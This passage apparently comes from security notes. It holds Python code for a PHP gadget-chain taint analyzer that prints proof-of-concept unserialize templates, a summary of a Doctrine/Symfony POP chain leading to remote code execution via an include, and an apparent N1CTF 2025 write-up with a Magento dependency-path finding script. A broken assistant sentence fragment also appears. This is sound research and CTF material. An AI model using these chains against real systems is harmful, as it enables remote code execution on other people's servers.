return (f"Gadget chain from {entry} to {sink.function}(). "
f"Path: {chain_str}")
def _generate_exploit_notes(self, path: List[Dict], sink: TaintSink,
injectable: List[Dict]) -> str:
"""Generate detailed exploitation guidance"""
notes = []
entry = path[0].get('method', 'Unknown')
notes.append(f"**Entry Point:** {entry}")
sink_path = sink.filepath or 'Unknown file'
notes.append(f"**Sink:** {sink.function}() [{sink.severity.name}] at {sink_path}:{sink.line}")
notes.append(f"**Chain Length:** {len(path)} steps\n")
if injectable:
notes.append("**Injectable Classes:**")
for obj in injectable:
cls = obj['class']
props = obj['properties']
notes.append(f" • {cls}")
if props:
notes.append(f" Properties: {', '.join(props[:5])}")
if len(props) > 5:
notes.append(f" ... and {len(props) - 5} more")
notes.append("")
# Add PoC template
if injectable and any('__wakeup' in entry or '__destruct' in entry for entry in [path[0].get('method', '')]):
notes.append("**Proof of Concept:**")
notes.append("```php")
target_class = injectable[0]['class']
target_props = injectable[0]['properties']
notes.append(f"$exploit = new {target_class}();")
for prop in target_props[:3]:
notes.append(f"$exploit->{prop} = 'PAYLOAD'; // Control this")
notes.append("$serialized = serialize($exploit);")
notes.append("// Trigger: unserialize($serialized);")
notes.append("```\n")
# Add chain visualization
notes.append("**Execution Flow:**")
for i, step in enumerate(path, 1):
method = step.get('method', 'Unknown')
call_type = step.get('call_type', 'entry')
method_file = step.get('method_file') or 'Unknown file'
method_line = step.get('method_line', 0)
call_file = step.get('call_file') or 'Unknown file'
call_line = step.get('call_line', 0)
base = f" {i}. {method} [{call_type}]"
location = f"{method_file}:{method_line}" if method_line else method_file
base += f" — defined at {location}"
if call_type != 'entry':
if call_line:
call_location = f"{call_file}:{call_line}"
else:
call_location = call_file
base += f" (invoked from {call_location})"
notes.append(base)
return "\n".join(notes)
class Reporter:
"""Enhanced reporter"""
def __init__(self):
self.chains: List[GadgetChain] = []
def add_chains(self, chains: List[GadgetChain]):
self.chains.extend(chains)
def generate_text_report(self) -> str:
"""Generate detailed text report"""
if not self.chains:
return "\n✓ No gadget chains detected.\n"
lines = []
lines.append("\n" + "=" * 100)
lines.append(" PHP GADGET CHAIN ANALYSIS - DETAILED REPORT")
lines.append("=" * 100)
lines.append(f"\nTotal Chains: {len(self.chains)}")
# Statistics
by_severity = defaultdict(int)
for chain in self.chains:
by_severity[chain.severity.name] += 1
lines.append("\nSeverity Breakdown:")
for severity in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
count = by_severity.get(severity, 0)
if count > 0:
lines.append(f" 🔴 {severity}: {count}")
lines.append("\n" + "=" * 100)
# Sort by severity and confidence
sorted_chains = sorted(
self.chains,
key=lambda c: (c.severity.value, c.confidence),
reverse=True
)
for chain in sorted_chains:
lines.append(f"\n{'='*100}")
lines.append(f"🔴 CHAIN #{chain.chain_id} - {chain.severity.name} SEVERITY (Confidence: {chain.confidence:.0%})")
lines.append("="*100)
sink_path = chain.sink.filepath or 'Unknown file'
lines.append(f"\nSink Location: {sink_path}:{chain.sink.line}")
lines.append("\nExecution Flow:")
for step in chain.chain_path:
method = step.get('method', 'Unknown')
call_type = step.get('call_type', 'entry')
method_file = step.get('method_file') or 'Unknown file'
method_line = step.get('method_line', 0)
call_file = step.get('call_file') or 'Unknown file'
call_line = step.get('call_line', 0)
location = f"{method_file}:{method_line}" if method_line else method_file
entry = f" • {method} [{call_type}] — defined at {location}"
if call_type != 'entry':
call_location = f"{call_file}:{call_line}" if call_line else call_file
entry += f" (invoked from {call_location})"
lines.append(entry)
lines.append(f"\n{chain.description}\n")
lines.append(chain.exploitation_notes)
lines.append("")
lines.append("="*100)
return "\n".join(lines)
def generate_json_report(self) -> str:
    """Serialise the collected chains as an indented JSON document.

    The document has three keys: ``total_chains``, ``severity_breakdown``
    (severity name -> count) and ``chains`` (one object per chain with its
    sink, path steps, injectable objects and description).
    """
    severity_counts = defaultdict(int)
    for chain in self.chains:
        severity_counts[chain.severity.name] += 1

    def describe_step(step):
        # Missing keys fall back to '' for text fields and 0 for line numbers.
        return {
            'method': step.get('method', ''),
            'class': step.get('class', ''),
            'type': step.get('type', ''),
            'call_type': step.get('call_type', ''),
            'method_file': step.get('method_file', ''),
            'method_line': step.get('method_line', 0),
            'call_file': step.get('call_file', ''),
            'call_line': step.get('call_line', 0),
            'line': step.get('line', 0),
        }

    def describe_chain(chain):
        sink = chain.sink
        return {
            'id': chain.chain_id,
            'severity': chain.severity.name,
            'confidence': chain.confidence,
            'entry_points': chain.entry_points,
            'sink': {
                'function': sink.function,
                'location': sink.location,
                'filepath': sink.filepath,
                'severity': sink.severity.name,
                'line': sink.line,
            },
            'path': [describe_step(step) for step in chain.chain_path],
            'injectable_objects': chain.injectable_objects,
            'description': chain.description,
        }

    report = {
        'total_chains': len(self.chains),
        'severity_breakdown': dict(severity_counts),
        'chains': [describe_chain(chain) for chain in self.chains],
    }
    return json.dumps(report, indent=2)
class GadgetChainAnalyzer:
    """Drive the pipeline: parse PHP sources, walk the ASTs, run taint analysis."""

    def __init__(self):
        """Create the PHP parser and the reporter.

        Prints installation hints and exits with status 1 when constructing
        the parser raises RuntimeError.
        """
        try:
            self.parser = PHPASTParser()
        except RuntimeError as exc:
            hints = (
                f"\n❌ Error: {exc}",
                "\nInstallation instructions:",
                " 1. Ensure PHP ast extension is installed (e.g., sudo apt-get install php-ast)",
                " 2. Or install python wrapper: pip install php-ast",
            )
            for hint in hints:
                print(hint)
            sys.exit(1)
        self.reporter = Reporter()

    def analyze_directory(self, directory: str, recursive: bool = True, stream_output: bool = True) -> List[GadgetChain]:
        """Parse every PHP file under ``directory`` and return the detected chains.

        Progress is printed along the way.  Returns an empty list when no PHP
        file is found or none could be parsed.
        """
        print(f"\n📁 Scanning directory: {directory}")
        mode = '✓ enabled' if recursive else '✗ disabled'
        print(f" Recursive mode: {mode}")

        sources = self._find_php_files(directory, recursive)
        if not sources:
            print("\n❌ No PHP files found!")
            return []
        total = len(sources)
        print(f"\n📄 Found {total} PHP file(s)\n")

        # Parse each file; a failure is counted and reported but never aborts the run.
        parsed_ok = []
        failures = 0
        for position, source in enumerate(sources, 1):
            try:
                print(f" [{position}/{total}] Parsing: {source}")
                outcome = self.parser.parse_file(source)
                if not outcome['success']:
                    print(f" ✗ Failed: {outcome.get('error', 'Unknown error')}")
                    failures += 1
                    continue
                parsed_ok.append(outcome)
                print(" ✓ Success")
            except Exception as e:
                print(f" ✗ Exception: {e}")
                failures += 1

        print(f"\n📊 Parsing complete: {len(parsed_ok)} success, {failures} failed\n")
        if not parsed_ok:
            print("❌ No files successfully parsed")
            return []

        # A single walker accumulates classes/methods/calls across all files.
        print("🔍 Analyzing AST...")
        walker = ASTWalker()
        for tree in parsed_ok:
            walker.walk(tree)
        print(f" ✓ Found {len(walker.classes)} classes")
        print(f" ✓ Found {len(walker.methods)} methods")
        print(f" ✓ Found {len(walker.calls)} call sites")
        print(f" ✓ Found {len(walker.property_accesses)} property accesses\n")

        print("🔬 Performing taint analysis...")
        return AdvancedTaintAnalyzer(walker).analyze(stream_output=stream_output)

    def analyze_file(self, filepath: str, stream_output: bool = True) -> List[GadgetChain]:
        """Parse one PHP file and return the chains detected in it.

        Returns an empty list when the parser reports failure.
        """
        print(f"\n📄 Analyzing file: {filepath}\n")
        outcome = self.parser.parse_file(filepath)
        if not outcome['success']:
            print(f"❌ Failed to parse: {outcome.get('error')}")
            return []

        walker = ASTWalker()
        walker.walk(outcome)
        print(f" ✓ Found {len(walker.classes)} classes")
        print(f" ✓ Found {len(walker.methods)} methods\n")

        print("🔬 Performing taint analysis...")
        return AdvancedTaintAnalyzer(walker).analyze(stream_output=stream_output)

    def _find_php_files(self, directory: str, recursive: bool) -> List[str]:
        """Return the sorted paths of ``*.php`` files in ``directory``.

        With ``recursive`` the whole tree is walked; otherwise only direct
        children are considered.  A missing path or a non-directory prints an
        error and yields an empty list.
        """
        base = Path(directory)
        if not base.exists():
            print(f"❌ Error: Directory '{directory}' does not exist")
            return []
        if not base.is_dir():
            print(f"❌ Error: '{directory}' is not a directory")
            return []

        if recursive:
            found = [
                os.path.join(root, name)
                for root, _dirs, names in os.walk(directory)
                for name in names
                if name.endswith('.php')
            ]
        else:
            found = [str(entry) for entry in base.glob('*.php') if entry.is_file()]
        found.sort()
        return found
def main():
    """Command-line entry point: parse options, run the analysis, print a report.

    Exit status: 0 when no chain survives filtering, 2 when at least one
    CRITICAL chain is reported, 1 for any other reported chain, when the
    php-ast module is missing, or when the analysis fails or is interrupted.
    """
    parser = argparse.ArgumentParser(
        description='Advanced PHP Gadget Chain Taint Analyzer',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
%(prog)s -d /path/to/php/project -r
%(prog)s -f vulnerable.php -o json
%(prog)s -d /var/www --min-confidence 0.7 --min-severity HIGH
Requirements:
pip install php-ast
Note: php-ast requires PHP with the ast extension enabled.
See: https://github.com/nikic/php-ast
"""
    )
    parser.add_argument('-d', '--directory', help='Directory to analyze')
    parser.add_argument('-f', '--file', help='Single file to analyze')
    parser.add_argument('-r', '--recursive', action='store_true',
                        help='Recursively scan directory')
    parser.add_argument('-o', '--output', choices=['text', 'json'],
                        default='text', help='Output format (default: text)')
    parser.add_argument('--min-confidence', type=float, default=0.0,
                        help='Minimum confidence threshold (0.0-1.0)')
    parser.add_argument('--min-severity',
                        choices=['LOW', 'MEDIUM', 'HIGH', 'CRITICAL'],
                        help='Minimum severity level')
    parser.add_argument('--show-all', action='store_true',
                        help='Show all chains including low confidence')
    parser.add_argument('--no-stream', action='store_true',
                        help='Disable streaming output (show all results at end)')
    parser.add_argument('--summary-only', action='store_true',
                        help='Show only summary, not full details')
    args = parser.parse_args()

    if not (args.directory or args.file):
        parser.error('Either --directory or --file must be specified')

    # The analysis cannot run without the php-ast binding.
    if not PHP_AST_AVAILABLE:
        for message in (
            "\n❌ Error: php-ast module is not installed",
            "\nInstallation instructions:",
            " 1. Install PHP ast extension:",
            " - Ubuntu/Debian: sudo apt-get install php-ast",
            " - Or compile from source: https://github.com/nikic/php-ast",
            " 2. Install Python package:",
            " pip install php-ast",
        ):
            print(message)
        sys.exit(1)

    analyzer = GadgetChainAnalyzer()

    # Run the analysis; --directory takes precedence when both are given.
    try:
        stream_output = not args.no_stream
        if args.directory:
            chains = analyzer.analyze_directory(args.directory, args.recursive, stream_output)
        else:
            chains = analyzer.analyze_file(args.file, stream_output)
    except KeyboardInterrupt:
        print("\n\n⚠️ Analysis interrupted by user")
        sys.exit(1)
    except Exception as e:
        print(f"\n❌ Error during analysis: {e}")
        import traceback
        traceback.print_exc()
        sys.exit(1)

    # Confidence filter: applied unless --show-all is given with the default
    # threshold of 0 (in which case it would keep everything anyway).
    filtered_chains = chains
    if not args.show_all or args.min_confidence > 0:
        filtered_chains = [c for c in filtered_chains if c.confidence >= args.min_confidence]
    if args.min_severity:
        floor = TaintLevel[args.min_severity].value
        filtered_chains = [c for c in filtered_chains if c.severity.value >= floor]

    analyzer.reporter.add_chains(filtered_chains)

    rule = "=" * 100
    markers = {'CRITICAL': '🔴', 'HIGH': '🟠', 'MEDIUM': '🟡', 'LOW': '🟢'}

    if args.output == 'json':
        print(analyzer.reporter.generate_json_report())
    elif args.summary_only:
        print("\n" + rule)
        print(f"📊 FINAL SUMMARY: {len(filtered_chains)} chains detected")
        print(rule)
        by_severity = defaultdict(int)
        for chain in filtered_chains:
            by_severity[chain.severity.name] += 1
        print("\nSeverity Breakdown:")
        for severity in ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']:
            count = by_severity.get(severity, 0)
            if count > 0:
                print(f" {markers.get(severity, '⚪')} {severity}: {count}")
    elif args.no_stream:
        # Nothing was streamed, so the full report has not been shown yet.
        print(analyzer.reporter.generate_text_report())
    else:
        # Details were already streamed during analysis; print a digest only.
        print("\n" + rule)
        print("📊 SUMMARY OF ALL DETECTED CHAINS")
        print(rule)
        ranked = sorted(filtered_chains, key=lambda c: (c.severity.value, c.confidence), reverse=True)
        current_severity = None
        for chain in ranked:
            # Emit a heading each time the severity group changes.
            if chain.severity.name != current_severity:
                current_severity = chain.severity.name
                print(f"\n{markers.get(current_severity, '⚪')} {current_severity} SEVERITY CHAINS")
                print("-" * 100)

            sink_file = chain.sink.filepath or 'Unknown'
            print(f"Chain #{chain.chain_id:<3} | Conf: {chain.confidence:.0%} | Sink: {chain.sink.function}()")
            print(f" Location: {sink_file}:{chain.sink.line}")

            if chain.chain_path:
                first_step = chain.chain_path[0]
                entry_method = first_step.get('method', '?')
                entry_file = first_step.get('method_file', 'Unknown')
                print(f" Entry: {entry_method} in {entry_file}:{first_step.get('method_line', 0)}")

            if chain.injectable_objects:
                # Show at most two class names, then a "+N more" suffix.
                names = [o['class'] for o in chain.injectable_objects]
                shown = ", ".join(names[:2])
                if len(names) > 2:
                    shown += f" (+{len(names)-2} more)"
                print(f" Trigger: new {shown}")

            print(" Flow:")
            for number, step in enumerate(chain.chain_path, 1):
                method = step.get('method', '?')
                file_path = step.get('method_file', 'Unknown')
                line_num = step.get('method_line', 0)
                print(f" {number}. {method} in {file_path}:{line_num}")
            print("")
        print("💡 Use --no-stream for full details of all chains")

    # Exit status reflects the most severe finding.
    if not filtered_chains:
        print("\n✅ No significant vulnerabilities detected")
        sys.exit(0)
    critical_count = sum(1 for c in filtered_chains if c.severity == TaintLevel.CRITICAL)
    high_count = sum(1 for c in filtered_chains if c.severity == TaintLevel.HIGH)
    if critical_count:
        print(f"\n⚠️ {critical_count} CRITICAL severity chain(s) found!")
        sys.exit(2)
    if high_count:
        print(f"\n⚠️ {high_count} HIGH severity chain(s) found!")
    sys.exit(1)
if __name__ == '__main__':
main()
Intended
The solver has not been uploaded yet, but the author sent this to the server as a reference:
https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1
the solver added Drupal RCE gadget chain · anzuukino/phpggc@d0ac1bc
TL;DR
Entry point: Doctrine\Common\Cache\Psr6\CacheAdapter::__destruct(), which calls commit().
Method calls made inside commit() (e.g., get(), save(), delete()) can be redirected to attacker-controlled classes.
The delete() path can flow into PhpArrayAdapter::initialize(), which uses a vulnerable include, allowing full RCE if the attacker can already write a file to disk (first prerequisite).
Article Summary
The goal was to identify a valid POP chain inside the doctrine/doctrine-bundle dependency stack (downloaded 144M+ times). The research relies primarily on static analysis to identify a deserialization entrypoint and the sequence of method calls that lead to a vulnerable include.
Methodology Highlights
Search for PHP magic methods invoked automatically during deserialization, primarily __wakeup, __unserialize, and __destruct.
The deprecated but still-included class Doctrine\Common\Cache\Psr6\CacheAdapter was chosen because its __destruct() directly calls commit(). Many other Symfony classes defend against POP chains by throwing BadMethodCallException inside __wakeup() — CacheAdapter did not.
Inside commit(), code invokes methods such as getExpiry(), get(), save(), and delete() on properties like $this->cache and members of $this->deferredItems. Due to PHP’s weak typing, an attacker controlling the object graph produced from deserialization can make those properties reference attacker-controlled objects/classes.
The chain uses delete() to reach PhpArrayAdapter via CacheTrait::delete() → deleteItem() → PhpArrayAdapter::initialize(). The latter has an include of a file path that can be influenced if the attacker is able to write a file to disk — completing the RCE chain.
Impact
Remote code execution through the include in PhpArrayAdapter::initialize(), provided the attacker can first write a file to disk.
Example Code and Analysis Snippets
Below are the key snippets and commands used during static analysis and chain construction.
1. Locating __destruct without __wakeup protection
Search the dependency tree for classes implementing __destruct, then filter out those whose __wakeup() defends by throwing BadMethodCallException:
# Search for classes implementing __destruct without a __wakeup protection
$ grep -rl '__destruct' | xargs grep -L BadMethodCallException
doctrine/cache/lib/Doctrine/Common/Cache/Psr6/CacheAdapter.php
# ... other results
2. The CacheAdapter entrypoint
CacheAdapter::__destruct() immediately calls commit() — a controllable jump-start for the POP chain:
<?php namespace Doctrine\Common\Cache\Psr6;
// Excerpt: only the destructor is shown; the rest of the class is elided.
final class CacheAdapter implements CacheItemPoolInterface {
    // [...]
    /**
     * Destructor: forwards straight to commit(), so destroying an instance
     * is enough to reach commit() without any explicit call.
     */
    public function __destruct() {
        // This call is the start of the POP chain
        $this->commit();
    }
}
3. commit() — how attacker-controlled properties are used
Fields that an attacker can influence during deserialization:
<?php namespace Doctrine\Common\Cache\Psr6;
// Excerpt: bracketed numbers ([2], [3], [4]) label the interactions of
// interest; the surrounding statements of commit() are elided.
final class CacheAdapter implements CacheItemPoolInterface {
    /** @var Cache */ // Controlled by the attacker
    private $cache;
    /** @var array<CacheItem|TypedCacheItem> */
    private $deferredItems = []; // Controlled by the attacker
    // [...]
    /**
     * Abridged view of commit(): every method invoked here is called on a
     * property that the attacker controls after deserialization.
     */
    public function commit(): bool {
        // ... loop through $this->deferredItems
        // Example interactions on controlled objects:
        // [2] $byLifetime[(int) $lifetime][$key] = $item->get();
        // [4] Final call that leads to RCE chain:
        // NOTE: $expiredKeys is presumably populated by the elided loop above.
        switch (count($expiredKeys)) {
            case 0:
                break;
            case 1:
                // Exactly one expired key: delete() is called on $this->cache.
                $this->cache->delete(current($expiredKeys)); // <--- chosen jump point
                break;
            default:
                $this->doDeleteMultiple($expiredKeys);
                break;
        }
        // [3] return $this->cache->save($key, $item->get(), (int) $lifetime);
        // ...
    }
}
4. The final link: delete() → trait → PhpArrayAdapter::initialize()
CacheTrait::delete() funnels into deleteItem(). When the implementation is PhpArrayAdapter, deleteItem() leads to PhpArrayAdapter::initialize() which contains an include on a filesystem path — the step that makes RCE possible if the attacker can place a file there.
# Showing the delete wrapper from the CacheTrait
$ cat ./symfony/cache-contracts/CacheTrait.php | grep 'function delete(' -A 3
public function delete(string $key): bool {
return $this->deleteItem($key);
}
(From there, tracing the concrete implementation of deleteItem() to PhpArrayAdapter::initialize() reveals the vulnerable include.)
Mitigations & Recommendations
Avoid calling unserialize() on untrusted input. Use safe serialization formats (JSON, msgpack with safe decoding) or data signing to ensure integrity.
Harden the environment by restricting include paths, using open_basedir, or applying code-hardening tools that detect suspicious deserialization patterns.
Closing notes
If you want, I can:
Which of those would you like next?
CVE Magento\Framework\Url and make taint analysis yourself
| Event Name | N1CTF 2025 |
| GitHub URL | - |
| Challenge Name | This challenge has been ruined |
Attachments
References
solution
This challenge has been ruined:
source点为可匿名访问的API,sink点为Magento\Framework\Url, API访问时解析JSON数据进行依赖注入,构建所有实现的依赖关系,使用构造器方法进行污点传播,写个脚本找出source到sink点的所有路径即可
from __future__ import annotations
import os
import re
import sys
import xml.etree.ElementTree as ET
from collections import deque
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple
# Directory containing this script; every other path is resolved against it.
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
# Root of the unpacked Magento source tree to analyse.
MAGENTO_ROOT = os.path.join(SCRIPT_DIR, "magento2-2.4.9-alpha3")
# Text file listing, one per line, the XML files scanned for <preference> elements.
DI_LIST_PATH = os.path.join(SCRIPT_DIR, "dis.txt")
# Text file listing, one per line, the XML files scanned for <route> elements.
WEBAPIS_LIST_PATH = os.path.join(SCRIPT_DIR, "webapis.txt")
# Sink class: constructor-dependency paths are searched up to this class.
TARGET_CLASS = "Magento\\Framework\\Url"
# Directories probed, in order, when mapping a class name to its PHP file.
CLASS_ROOTS = [
    os.path.join(MAGENTO_ROOT, "app", "code"),
    os.path.join(MAGENTO_ROOT, "lib", "internal"),
    os.path.join(MAGENTO_ROOT, "vendor"),
    os.path.join(MAGENTO_ROOT, "setup"),
    os.path.join(MAGENTO_ROOT, "generated"),
    os.path.join(MAGENTO_ROOT, "dev"),
]
# Type names (compared lower-cased) that never resolve to a class.
PRIMITIVE_TYPES = {
    "array",
    "bool",
    "boolean",
    "callable",
    "double",
    "float",
    "int",
    "integer",
    "iterable",
    "mixed",
    "object",
    "resource",
    "string",
    "void",
    "false",
    "true",
    "never",
}
@dataclass
class ClassInfo:
    """Facts extracted from one PHP class file by get_class_info()."""

    # Filesystem path of the PHP file the class was read from.
    path: str
    # Namespace declared in the file ("" when none was found).
    namespace: str
    # Alias -> fully qualified name, taken from the file's `use` statements.
    use_map: Dict[str, str]
    # Resolved name of the class after `extends`, or None.
    parent: Optional[str]
    # Resolved class names of the type-hinted constructor parameters.
    constructor_deps: List[str]
    # Full text of the PHP file.
    source: str
@dataclass(frozen=True)
class Endpoint:
    """One web API route and the service method it dispatches to."""

    # `url` attribute of the <route> element.
    url: str
    # `method` attribute of the <route> element.
    http_method: str
    # `class` attribute of the <service> element, without leading backslash.
    service_class: str
    # `method` attribute of the <service> element.
    service_method: str
def load_di_mapping() -> Dict[str, str]:
    """Collect ``<preference for=... type=...>`` pairs from the listed XML files.

    DI_LIST_PATH names one XML file per line (relative to SCRIPT_DIR); blank
    lines and lines starting with ``#`` are ignored, as are missing or
    malformed files.  Returns a dict mapping the ``for`` name to the ``type``
    name, both without leading backslashes.  Returns an empty dict when the
    list file does not exist.
    """
    preferences: Dict[str, str] = {}
    if not os.path.exists(DI_LIST_PATH):
        return preferences

    with open(DI_LIST_PATH, "r", encoding="utf-8") as listing:
        entries = [raw.strip() for raw in listing]

    for entry in entries:
        if not entry or entry.startswith("#"):
            continue
        xml_path = os.path.normpath(os.path.join(SCRIPT_DIR, entry))
        if not os.path.isfile(xml_path):
            continue
        try:
            document = ET.parse(xml_path)
        except ET.ParseError:
            # Malformed fixtures (common under dev/tests) are skipped.
            continue
        for preference in document.getroot().findall(".//preference"):
            interface = preference.attrib.get("for")
            implementation = preference.attrib.get("type")
            if interface and implementation:
                # A later file overrides an earlier one, mirroring Magento DI behaviour.
                preferences[interface.lstrip("\\")] = implementation.lstrip("\\")
    return preferences
def class_to_path(class_name: str) -> Optional[str]:
    """Return the first existing PHP file for ``class_name`` under CLASS_ROOTS.

    The class name is turned into a relative path by replacing namespace
    separators with the OS path separator and appending ``.php``.  Returns
    None when no root contains such a file.
    """
    relative = class_name.replace("\\", os.sep) + ".php"
    candidates = (os.path.join(root, relative) for root in CLASS_ROOTS)
    return next((path for path in candidates if os.path.isfile(path)), None)
def parse_use_statements(content: str) -> Dict[str, str]:
    """Build an alias -> fully-qualified-name map from a PHP file's ``use`` lines.

    Handles comma-separated imports and brace-grouped imports
    (``use A\\{B, C as D};``).  Statements beginning with ``function `` or
    ``const `` are ignored.
    """
    aliases: Dict[str, str] = {}
    for found in re.finditer(r"^\s*use\s+([^;]+);", content, re.MULTILINE):
        clause = found.group(1).strip()
        if not clause or clause.startswith(("function ", "const ")):
            continue

        # Split on commas that are not inside a {...} group.
        pieces: List[str] = []
        buffer: List[str] = []
        nesting = 0
        for char in clause:
            if char == "," and nesting == 0:
                pieces.append("".join(buffer).strip())
                buffer = []
                continue
            if char == "{":
                nesting += 1
            elif char == "}":
                nesting = max(0, nesting - 1)
            buffer.append(char)
        pieces.append("".join(buffer).strip())

        for piece in filter(None, pieces):
            if "{" not in piece:
                target, alias = _extract_use_part(piece)
                aliases[alias] = target
                continue
            # Grouped import: the prefix is shared by every member in the braces.
            prefix, _, members = piece.partition("{")
            prefix = prefix.strip().rstrip("\\")
            for member in members.rstrip("}").split(","):
                member = member.strip()
                if not member:
                    continue
                target, alias = _extract_use_part(member)
                aliases[alias] = "\\".join(
                    name for name in (prefix, target) if name
                ).strip("\\")
    return aliases
def _extract_use_part(part: str) -> Tuple[str, str]:
pieces = part.split(" as ")
if len(pieces) == 2:
full_name = pieces[0].strip().lstrip("\\")
alias = pieces[1].strip()
else:
full_name = part.strip().lstrip("\\")
alias = full_name.split("\\")[-1]
return full_name, alias
def resolve_type(
    type_name: str, namespace: str, use_map: Dict[str, str]
) -> Optional[str]:
    """Resolve a PHP type hint to a class name, or None if it names no class.

    Leading ``&`` and ``?`` are dropped.  Primitive types and ``parent``
    resolve to None.  For a union the first member that resolves wins
    (``null`` is skipped).  ``self`` and ``static`` return ``namespace``
    as-is.  Other names are resolved through ``use_map`` and then
    ``namespace``.
    """
    if not type_name:
        return None
    candidate = type_name.strip().lstrip("&").lstrip("?")
    if not candidate or candidate.lower() in PRIMITIVE_TYPES:
        return None

    if "|" in candidate:
        for member in (piece.strip() for piece in candidate.split("|")):
            if member.lower() == "null":
                continue
            hit = resolve_type(member, namespace, use_map)
            if hit:
                return hit
        return None

    if candidate in ("self", "static"):
        return namespace
    if candidate == "parent":
        return None

    # Already fully qualified.
    if candidate.startswith("\\"):
        return candidate.lstrip("\\")

    # Qualified name: the first segment may be an imported alias.
    if "\\" in candidate:
        head, tail = candidate.split("\\", 1)
        base = use_map.get(head)
        segments = [base, tail] if base else [namespace, candidate]
        return "\\".join(segments).strip("\\")

    # Bare name: imported alias first, then the current namespace.
    imported = use_map.get(candidate)
    if imported:
        return imported
    return f"{namespace}\\{candidate}" if namespace else candidate
# Memo of get_class_info() results; None records "class file not found".
CLASS_INFO_CACHE: Dict[str, Optional[ClassInfo]] = {}


def get_class_info(class_name: str) -> Optional[ClassInfo]:
    """Read and summarise the PHP file that defines ``class_name``.

    Returns a ClassInfo holding the namespace, ``use`` map, resolved parent
    class and resolved constructor dependency types, or None when no file
    for the class exists.  Results (including None) are memoised in
    CLASS_INFO_CACHE.

    The parsing is regex based and approximate; parentheses inside string
    literals in a constructor signature are not recognised.
    """
    if class_name in CLASS_INFO_CACHE:
        return CLASS_INFO_CACHE[class_name]

    path = class_to_path(class_name)
    if not path or not os.path.isfile(path):
        CLASS_INFO_CACHE[class_name] = None
        return None

    try:
        with open(path, "r", encoding="utf-8") as handle:
            content = handle.read()
    except UnicodeDecodeError:
        # Fall back to a decoding that accepts any byte sequence.
        with open(path, "r", encoding="latin-1") as handle:
            content = handle.read()

    namespace = ""
    ns_match = re.search(r"namespace\s+([^;]+);", content)
    if ns_match:
        namespace = ns_match.group(1).strip()

    use_map = parse_use_statements(content)

    # Prefer a declaration that starts its own line: an unanchored search
    # matches prose such as "Abstract class for ..." inside a docblock first
    # and would then miss the real `extends` clause.  The unanchored pattern
    # is kept as a fallback for declarations that do not start a line.
    declaration = (
        r"(?:(?:final|abstract|readonly)\s+)*class\s+(\w+)"
        r"(?:\s+extends\s+([^\s\{]+))?"
    )
    class_match = re.search(r"^[ \t]*" + declaration, content, re.MULTILINE)
    if class_match is None:
        class_match = re.search(declaration, content)
    parent = None
    if class_match:
        parent_raw = class_match.group(2)
        if parent_raw:
            parent = resolve_type(parent_raw.strip(), namespace, use_map)

    # Locate the constructor's parameter list by balancing parentheses; a
    # "first closing paren" match truncates the list at defaults such as
    # `array()` and silently drops every parameter after it.
    params_str = None
    ctor_open = re.search(r"function\s+__construct\s*\(", content)
    if ctor_open:
        depth = 1
        cursor = ctor_open.end()
        while cursor < len(content) and depth:
            ch = content[cursor]
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            cursor += 1
        if depth == 0:
            params_str = content[ctor_open.end():cursor - 1]

    deps: List[str] = []
    if params_str is not None:
        # Drop PHP 8 attributes (#[...]) before splitting.
        params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)

        # Split on commas that are not nested inside (...) or [...].
        tokens: List[str] = []
        current: List[str] = []
        depth = 0
        for ch in params_clean:
            if ch == "," and depth == 0:
                token = "".join(current).strip()
                if token:
                    tokens.append(token)
                current = []
                continue
            if ch in ("(", "["):
                depth += 1
            elif ch in (")", "]"):
                depth = max(0, depth - 1)
            current.append(ch)
        tail = "".join(current).strip()
        if tail:
            tokens.append(tail)

        for token in tokens:
            token = token.strip()
            if not token:
                continue
            # Strip the default value, then a leading promotion modifier.
            if "=" in token:
                token = token.split("=", 1)[0].strip()
            token = re.sub(
                r"^(public|protected|private|final|readonly|static)\s+", "", token
            )
            # The type hint is the last word before the `$variable`.
            type_hint = None
            for part in token.split():
                if part.startswith("&") or part.startswith("..."):
                    continue
                if part.startswith("$"):
                    break
                type_hint = part
            if not type_hint:
                continue
            resolved = resolve_type(type_hint, namespace, use_map)
            if resolved:
                deps.append(resolved)

    info = ClassInfo(
        path=path,
        namespace=namespace,
        use_map=use_map,
        parent=parent,
        constructor_deps=deps,
        source=content,
    )
    CLASS_INFO_CACHE[class_name] = info
    return info
def resolve_concretes(type_name: str, di_mapping: Dict[str, str]) -> List[str]:
    """Follow DI preferences from ``type_name`` to the concrete class.

    Each name maps to at most one target, so resolution is a walk along a
    single chain.  Returns a one-element list holding the first name that
    has no (non-empty) preference.  A preference that points at itself is
    treated as terminal; previously it produced an empty result and the
    class was silently dropped from the search.  A cycle spanning several
    names has no terminal class and still yields an empty list.
    """
    current = type_name.lstrip("\\")
    visited: Set[str] = set()
    while current not in visited:
        visited.add(current)
        target = di_mapping.get(current)
        if not target:
            return [current]
        normalized = target.lstrip("\\")
        if normalized == current:
            # `for` and `type` name the same class: it is its own concrete.
            return [current]
        current = normalized
    return []
def find_constructor_path(
    start_class: str, di_mapping: Dict[str, str], target: str = TARGET_CLASS
) -> Optional[List[str]]:
    """Breadth-first search from ``start_class`` to ``target``.

    Edges run from a class to the concrete implementations of its constructor
    dependencies and of its parent class.  A dependency ending in ``\\Proxy``
    is also followed with that suffix removed.  Returns the list of class
    names from start to target, or None when the target is unreachable.

    Candidates are visited in a fixed order so that the reported path is the
    same on every run; iterating a ``set`` of names made the choice between
    equally short paths depend on string hash randomisation.
    """
    normalized_start = start_class.lstrip("\\")
    normalized_target = target.lstrip("\\")
    queue: deque[str] = deque([normalized_start])
    # Doubles as the visited set: every discovered class has an entry.
    parents: Dict[str, Optional[str]] = {normalized_start: None}

    while queue:
        current = queue.popleft()
        if current == normalized_target:
            # Walk the parent links back to the start and reverse.
            path: List[str] = []
            node: Optional[str] = current
            while node is not None:
                path.append(node)
                node = parents[node]
            path.reverse()
            return path

        info = get_class_info(current)
        if not info:
            continue

        dependencies = list(info.constructor_deps)
        if info.parent:
            dependencies.append(info.parent)

        for dep in dependencies:
            dep_norm = dep.lstrip("\\")
            candidates = [dep_norm]
